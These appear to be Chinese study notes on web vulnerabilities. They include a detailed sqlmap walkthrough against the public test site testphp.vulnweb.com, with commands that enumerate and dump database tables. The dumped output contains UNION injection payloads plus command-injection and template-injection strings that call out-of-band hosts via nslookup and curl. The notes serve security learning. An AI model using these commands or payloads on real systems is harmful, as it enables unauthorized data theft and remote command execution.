安全事件

  • 钓鱼

  • 篡改网页

  • 暗链(拿到控制权,修改网页链接)

  • webshell(拿到控制权,上传后门)

    image-20240203215747007

XSS

跨站脚本,Cross Site Script

危害:调取用户信息、钓鱼、制造蠕虫

image-20240203220405479

XSS分类

  • 存储型

    image-20240204142104759

    image-20240204142214925

  • 反射型

    image-20240204142421052

  • DOM型

image-20240204143630828

image-20240204144525057

CSRF

cross-site request forgery,跨站请求伪造

概念:利用用户已登陆的身份,在用户毫不知情的情况下,以用户的名义完成非法操作

危害:

  • 执行恶意操作(被转帐、被发垃圾评论等)
  • 制造蠕虫

image-20240205125826167

CSRF原理分析

image-20240205130248620

CSRF攻击代码

image-20240205130453828

点击劫持

概念

通过覆盖不可见的框架误导受害者点击而造成的攻击行为

示例

image-20240205135708175

对应源码

image-20240205140558573

特点

image-20240205140019964

URL跳转

概念

借助未验证的URL跳转,将应用程序引导到不安全的第三方区域,从而导致的安全问题。

跳转方式

  • Header头跳转、

    image-20240205144230890

  • JavaScript跳转

    image-20240205144314425

  • META跳转

image-20240205144348663

sql注入

sql injection

概念

一种常见的web安全漏洞,攻击者利用这个漏洞,可以访问或修改数据,或者利用潜在的数据库漏洞进行攻击

原理

image-20240205150750718

image-20240205150830374

image-20240205150845478

image-20240205151032391

一次sql注入过程

  • 获取用户请求参数
  • 拼接到代码当中
  • sql语句按照我们构造参数的语句执行成功

image-20240205151251670

sql必备条件

  • 可以控制输入的数据
  • 服务器要执行的代码拼接了控制的数据

sql本质

数据和代码未分离,即数据当作了代码来执行

sql注入利用

获取系统版本

image-20240205152355105

获取当前数据库用户

image-20240205152426643

sql注入危害

获取数据库信息
image-20240205152134374
其他危害
image-20240205152212824

命令注入解析

形象化引入

image-20240205211354971

image-20240205211318242

命令注入前提条件

image-20240205211244708

拼接注入

image-20240205213403243

文件操作类漏洞

隐患

image-20240205215305313

文件上传漏洞

image-20240205215554625

任意文件下载漏洞

image-20240205215911110

可以尝试使用其他的url下载文件

任意文件下载漏洞危害

代码泄露、数据库配置文件泄露、系统文件泄露等

文件包含漏洞

image-20240205220516865

示例

image-20240205221238387 image-20240205221305593

漏洞扫描工具

image-20240207142624533

使用漏洞工具需要明确的问题

  • 对目标站点的误伤

    如:高流量、请求了危险功能(如删除数据库)

  • 漏洞扫描的盲区:逻辑漏洞

    如:订单金额数据篡改漏洞

漏洞评级问题

技术角度+业务角度

漏洞扫描结果的解读和运用

  • 测试用例可能需要调正
  • 误报和漏报
  • 将扫描结果作为人工测试的线索

sql注入–sqlmap

发现和利用sql注入漏洞基本流程

image-20240207160029365

sqlmap命令小技巧:字母缩写前一个-,完整单词是两个–

sql注入命令
发现注入点
1
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1"
查看用户
1
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --users

image-20240207202429854

查看有哪些数据库
1
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs

image-20240207202549135

查看当前用户和数据库
1
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-user --current-db

返回信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
D:\Program Files\sqlmapproject-sqlmap-ae1bd21>python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-user --current-db
___
__H__
___ ___[)]_____ ___ ___ {1.8.2#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:26:36 /2024-02-07/

[20:26:36] [INFO] resuming back-end DBMS 'mysql'
[20:26:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 4968=4968

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-2189 UNION ALL SELECT NULL,CONCAT(0x71706b7071,0x686a466b4c735652456b64534a5446686752567154457779767153616d46756e43504e5772696278,0x716a6a6a71),NULL-- -
---
[20:26:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL 8
[20:26:37] [INFO] fetching current user
current user: 'acuart@localhost'
[20:26:37] [INFO] fetching current database
current database: 'acuart'
[20:26:37] [INFO] fetched data logged to text files under 'C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com'

[*] ending @ 20:26:37 /2024-02-07/
查看当前数据库acuart中的数据表
1
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --tables -D "acuart"

返回信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
D:\Program Files\sqlmapproject-sqlmap-ae1bd21>python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --tables -D "acuart"
___
__H__
___ ___[)]_____ ___ ___ {1.8.2#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:30:00 /2024-02-07/

[20:30:00] [INFO] resuming back-end DBMS 'mysql'
[20:30:00] [INFO] testing connection to the target URL
[20:30:01] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 4968=4968

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-2189 UNION ALL SELECT NULL,CONCAT(0x71706b7071,0x686a466b4c735652456b64534a5446686752567154457779767153616d46756e43504e5772696278,0x716a6a6a71),NULL-- -
---
[20:30:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL 8
[20:30:01] [INFO] fetching tables for database: 'acuart'
Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+-----------+

[20:30:01] [INFO] fetched data logged to text files under 'C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com'

[*] ending @ 20:30:01 /2024-02-07/
查询目标数据库中目标数据表的列信息
1
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --columns -T "users" -D "acuart"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
D:\Program Files\sqlmapproject-sqlmap-ae1bd21>python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --columns -T "users" -D "acuart"
___
__H__
___ ___[(]_____ ___ ___ {1.8.2#stable}
|_ -| . [(] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:32:59 /2024-02-07/

[20:32:59] [INFO] resuming back-end DBMS 'mysql'
[20:32:59] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 4968=4968

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-2189 UNION ALL SELECT NULL,CONCAT(0x71706b7071,0x686a466b4c735652456b64534a5446686752567154457779767153616d46756e43504e5772696278,0x716a6a6a71),NULL-- -
---
[20:33:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL 8
[20:33:00] [INFO] fetching columns for table 'users' in database 'acuart'
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| name | varchar(100) |
| address | mediumtext |
| cart | varchar(100) |
| cc | varchar(100) |
| email | varchar(100) |
| pass | varchar(100) |
| phone | varchar(100) |
| uname | varchar(100) |
+---------+--------------+

[20:33:00] [INFO] fetched data logged to text files under 'C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com'

[*] ending @ 20:33:00 /2024-02-07/
查看多少条数据
1
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --count -T "users" -D "acuart"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
D:\Program Files\sqlmapproject-sqlmap-ae1bd21>python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --count -T "users" -D "acuart"
___
__H__
___ ___[']_____ ___ ___ {1.8.2#stable}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:38:15 /2024-02-07/

[20:38:16] [INFO] resuming back-end DBMS 'mysql'
[20:38:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 4968=4968

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-2189 UNION ALL SELECT NULL,CONCAT(0x71706b7071,0x686a466b4c735652456b64534a5446686752567154457779767153616d46756e43504e5772696278,0x716a6a6a71),NULL-- -
---
[20:38:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL 8
Database: acuart
+-------+---------+
| Table | Entries |
+-------+---------+
| users | 1 |
+-------+---------+

[20:38:16] [INFO] fetched data logged to text files under 'C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com'

[*] ending @ 20:38:16 /2024-02-07/
查看具体数据
1
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump -T "users" -D "acuart"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
D:\Program Files\sqlmapproject-sqlmap-ae1bd21>python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump -T "users" -D "acuart"
___
__H__
___ ___[.]_____ ___ ___ {1.8.2#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:39:46 /2024-02-07/

[20:39:47] [INFO] resuming back-end DBMS 'mysql'
[20:39:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 4968=4968

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-2189 UNION ALL SELECT NULL,CONCAT(0x71706b7071,0x686a466b4c735652456b64534a5446686752567154457779767153616d46756e43504e5772696278,0x716a6a6a71),NULL-- -
---
[20:39:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL 8
[20:39:47] [INFO] fetching columns for table 'users' in database 'acuart'
[20:39:47] [INFO] fetching entries for table 'users' in database 'acuart'
[20:39:48] [INFO] recognized possible password hashes in column 'cart'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: acuart
Table: users
[1 entry]
+---------------------+----------------------------------+------+-----------------+-----------------------------------------------------------------------------------+-------+--------------+--------------------------------------------------------------------------------------------------------------------------------------------------+
| cc | cart | pass | email | phone | uname | name | address |
+---------------------+----------------------------------+------+-----------------+-----------------------------------------------------------------------------------+-------+--------------+--------------------------------------------------------------------------------------------------------------------------------------------------+
| 1234-5678-2300-9000 | aa1041771b89328ddd3e0dbba2069227 | test | email@email.com | `(nslookup -q=cname hitdfzklrjrow9d8f0.bxss.me||curl hitdfzklrjrow9d8f0.bxss.me)` | test | Pedro Miguel | {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup 7170qtzuulqvxeuv-kkslifmkvdggunvafgi9sk0"~"deo.r87.me")}} |
+---------------------+----------------------------------+------+-----------------+-----------------------------------------------------------------------------------+-------+--------------+--------------------------------------------------------------------------------------------------------------------------------------------------+

[20:40:05] [INFO] table 'acuart.users' dumped to CSV file 'C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com\dump\acuart\users.csv'
[20:40:05] [INFO] fetched data logged to text files under 'C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com'

[*] ending @ 20:40:05 /2024-02-07/
products表有多少条数据
1
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --count -T "products" -D "acuart"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
D:\Program Files\sqlmapproject-sqlmap-ae1bd21>python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --count -T "products" -D "acuart"
___
__H__
___ ___[']_____ ___ ___ {1.8.2#stable}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:43:53 /2024-02-07/

[20:43:54] [INFO] resuming back-end DBMS 'mysql'
[20:43:54] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 4968=4968

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-2189 UNION ALL SELECT NULL,CONCAT(0x71706b7071,0x686a466b4c735652456b64534a5446686752567154457779767153616d46756e43504e5772696278,0x716a6a6a71),NULL-- -
---
[20:43:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL 8
Database: acuart
+----------+---------+
| Table | Entries |
+----------+---------+
| products | 3 |
+----------+---------+

[20:43:55] [INFO] fetched data logged to text files under 'C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com'

[*] ending @ 20:43:55 /2024-02-07/
查看products表中的数据,从第2条开始读,一直读到第3条为止
1
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump -T "products" -D "acuart" --start 2 --stop 3

<!--image-20240207205031188-->

下载acuart中所有表的数据
1
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump-all -D "acuart"

并保存在了下列文件夹中

1
C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com\dump\acuart
实现post,登录进去
1
python sqlmap.py -u "http://testphp.vulnweb.com/userinfo.php" --data="pass=g00dP&uname=1"

data引号里面的的数据可以通过awvs数据抓包得到

以上均是在测试站点下,在实际环境中,确定注入点以及基本的信息就可以了

敏感文件探测

敏感文件就像网站的秘密日记,如果没有保护好被访问者发现,就有可能暴露站点的脆弱性或保密数据

常见的敏感文件类型

  • 网站管理后台
  • 数据文件
  • 备份文件
  • Webshell

探测原理

猜测文件名,然后根据返回的HTTP状态码判断文件是否存在

image-20240215114951783

1
http://tool.oschina.net/commons?type=5

问题一

php的站点用asp的字典去扫描没用

如何去判断常见网站脚本类型?asp、php、aspx、jsp等

: 判断index的类型

问题二

每个网站都有所不同,通用的字典针对性差,命中率低,如何生成针对性的字典?

image-20240215121053581

搜索引擎语法

  • 想找到目标站点登录地址并且暴力破解密码

image-20240215130311096

  • 想查看目标站点有没有泄露数据库文件
image-20240215131035072

网路空间搜索引擎

SHODAN ZoomEy FOFA

原理

image-20240215132722576